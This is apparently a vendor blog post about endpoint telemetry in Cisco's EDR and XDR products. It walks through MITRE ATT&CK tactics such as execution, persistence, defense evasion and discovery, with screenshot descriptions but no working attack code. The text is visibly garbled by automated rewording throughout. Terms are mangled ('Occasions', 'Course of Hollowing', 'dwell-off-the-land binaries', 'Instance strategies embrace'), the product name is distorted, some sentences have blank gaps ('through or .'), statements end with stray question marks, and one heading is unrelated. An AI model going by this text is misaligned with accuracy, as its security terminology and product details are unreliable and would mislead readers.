A sophisticated cyberattack exploiting malware penetrates an organisation’s defences, culminating in significant financial losses. This lack of insight was neither an accidental omission nor a direct outcome, but rather a moderate consequence of limited endpoint transparency. With proactive surveillance and timely access to endpoint activity data, potentially hazardous situations could have been identified and mitigated before causing significant harm. The importance of comprehensive endpoint monitoring cannot be overstated.
What’s endpoint telemetry?
Endpoint telemetry in cybersecurity refers to the information gathered through monitoring activities on endpoint devices, such as computer systems and servers. This essential knowledge enables organisations to detect risks, respond swiftly to incidents, and fortify their overall cybersecurity defences through increased situational awareness.
Essential function of endpoint telemetry
Early visibility into complex cyberattacks is crucial for disrupting malicious activities at the earliest possible stage of the attack kill chain. If you can’t see it, you can’t stop it. It’s generally more effective to intervene at the outset of an assault rather than waiting for escalation.
In line with the MITRE ATT&CK framework, which is often utilized by cybersecurity professionals, most enterprise-level assaults — akin to Turla, ToddyCat, and WizardSpider (TrickBot) — contain varied levels, often known as ways, which attackers can use in numerous sequences to attain their aims.
The MITRE ATT&CK framework catalogues a comprehensive list of tactics, techniques, and procedures (TTPs) employed by attackers to breach endpoints, detailing each approach in depth. To effectively intercept malicious activities at the onset of an attack, it is crucial to monitor endpoints and document suspicious behaviors that align with common tactics. Capturing telemetry is crucial for developing effective countermeasures and detecting potential attacks at their inception. Endpoint telemetry also plays a crucial role in fuelling the knowledge base that powers XDR’s ability to detect, analyse, and respond to security threats across multiple environments, ultimately enabling more effective threat hunting and mitigation strategies.
Minimizing false positives
Navigating the complexities of effective threat detection via telemetry data relies heavily on minimizing false positive rates. Exploiting dwell-off-the-land binaries, commonly reputable tools and utilities with functional programs, cybercriminals leverage these trusted applications to orchestrate a range of tactics or sub-techniques. The notorious APT, a highly sophisticated state-sponsored hacking collective, has been known to employ or exploit vulnerabilities at various stages of an attack, potentially targeting sensitive information through or . Lazarus, a sophisticated threat actor, leverages various tactics, including the exploitation of legitimate system tools and software, to blend in seamlessly with everyday user activity and evade traditional security measures, thereby maintaining their anonymity.
Detecting these actions as malicious can lead to an unwarranted surge of false alarms. While analyzing potential solutions to address this issue, we could consider correlating relevant events and telemetry data generated during the exercise with a tool like XDR (Extended Detection and Response) software. Cisco XDR combines telemetry from diverse detection sources to produce highly accurate incident data, amplifying its ability to identify and halt sophisticated attacks while minimizing the risk of false alarms?
What security measures are in place to protect sensitive data transmitted via the Cisco SAFE architecture?
Cisco Safe Endpoint is an Endpoint Detection and Response (EDR) tool that collects and analyzes various types of endpoint telemetry. This system utilises a range of sophisticated detection engines to gather and analyse the telemetry data, identifying suspicious behaviour patterns and triggering alerts accordingly. We constantly fine-tune the product to seize extra telemetry and detect occasions of various criticality throughout completely different levels of the MITRE ATT&CK framework. Data from Cisco Safe Endpoint is fed into the Cisco XDR analytics platform, where it’s integrated with diverse intelligence feeds to produce accurate, detailed threat reports within Cisco XDR.
Discovering key detection moments through Cisco Safe Endpoint’s Occasions view, alongside machine trajectory telemetry insights in the Machine Trajectory view.
Safe Endpoint provides unparalleled visibility into the initial stages of a cyber attack, empowering users to swiftly neutralise complex threats before they intensify.
Exploring detection occasions
All of the occasions used on this instance will be considered from Administration->Occasions web page of the Cisco Safe Endpoint console.
The execution ways symbolize various tactics employed by attackers to bring an adversary’s payload into action on a compromised device, thereby enabling the perpetration of harmful activities.
Instance strategies embrace:
- PowerShell scripts that employ cryptic commands to run arbitrary code.
- Executing Scripts and Instructions through Windows Management Instrumentation (WMI).
- Executing code through native system APIs.
A screenshot below illustrates an incident triggered by Safe Endpoint’s Behavioral Safety engine, where a PowerShell command employing “Invoke-Expression” was identified as suspicious, with the trigger being the “sdiagnhost.exe” process.
Persistence mechanisms refer to the tactics employed by malware to maintain its presence on an exploited system, ensuring uninterrupted execution of its malicious payload despite system restarts or configuration changes. These tactics enable malware to maintain contact with a command-and-control server, thereby allowing it to receive further instructions.
Instance strategies embrace:
- This method involves either establishing novel entities or altering existing ones to embed malicious code that becomes operational upon system initiation or at predefined intervals.
- Manipulating registry settings to enable rogue software to launch automatically upon system boot-up.
- Scheduling recurring tasks to execute at predetermined times or frequencies.
Below is a screenshot that exemplifies a scenario where the creation of a new service enables the execution of malware upon startup.
Protection evasion encompasses tactics employed by adversaries to conceal their illicit payloads and avoid identification by security measures? The intent is to render it extremely challenging for security instruments and analysts to identify and halt the aggression.
Instance strategies embrace:
- When an attacker employs a technique known as process suspension, they establish a suspended course of action, subsequently injecting malicious code into the address space of that suspended process.
- Enable an attacker’s foothold by neutralizing the target system’s security measures, such as temporarily disabling antivirus software, firewalls, or logging mechanisms.
- Falsifying digital evidence to evade detection and conceal illicit activities.
A screenshot below depicts the Course of Hollowing methodology detected by the Exploit Prevention engine during the Protection Evasion phase of an attack, illustrating the engine’s efficacy in uncovering sophisticated tactics.
The concept of discovery pertains to the diverse tactics employed by antagonists to gather information about a target’s environment, often in an effort to gain a strategic advantage.
Instance strategies embrace:
- Identifying and categorizing system processes to pinpoint potential vulnerabilities or valuable assets.
- Gathering details regarding the operational framework, hardware configurations, and installed software applications.
- Determining the optimal community settings, exploring various interfaces, and familiarizing oneself with relevant tools and devices.
A screenshot below illustrates an unusual Safe Endpoint generation triggered by “tasklist.exe” anomalous activity within the endpoint, which is subsequently linked to execution by “rundll32.exe”, leveraging the process discovery methodology.
Machine trajectory telemetry
Cisco’s Safe Endpoint (CSE) captures two types of telemetry data: Exercise Telemetry and Behavioral Telemetry, both visible in the Machine Trajectory view.
Through the elimination of irrelevant data, this telemetry effectively minimizes noise, providing a transparent view into endpoint activities, encompassing processes, hierarchical process interactions, triggered events, files, and network activity – whether malevolent or benign in nature?
Below lies a visual representation of the Machine Trajectory view in the Safe Endpoint console, accompanied by Exercise Telemetry data that has been captured for analysis.
The machine trajectory view displays this specific type of telemetry following evaluation by the detection engine. Triggered when a malicious action is linked to an otherwise innocuous activity, providing crucial context to help differentiate between harmless and malevolent deeds.
Below is a screenshot of the Machine Trajectory view within the Safe Endpoint console, showcasing behavioral telemetry data captured by the detection engine. On this occasion, the Rundll32.exe process is linked to a potentially malicious network activity.
The telemetry details recorded by Safe Endpoint provide crucial situational awareness throughout the observed event, enabling swift scenario assessment for safety teams. This enriched data not only enables a comprehensive understanding of the exercise’s purpose and tone but also equips teams with the tools to undertake more rigorous and effective inquiries, thereby fostering enhanced decision-making and problem-solving capabilities. By offering a profound comprehension of prospective perils, Safe Endpoint simplifies the risk detection process, thereby reducing response times and bolstering overall security stance?
Conclusion
The analysis of Cisco Safe Endpoint’s detection triggers and telemetry capabilities showcases the enhanced situational awareness that enables swift response to emerging threats. Through meticulous monitoring and in-depth analysis of endpoint behaviors, companies gain valuable intelligence on potential vulnerabilities, enabling them to swiftly identify and respond to incursions at their inception. Enhanced visibility is paramount for safeguarding critical programs and strengthening defenses against ever-advancing cyber threats.
References
Share:
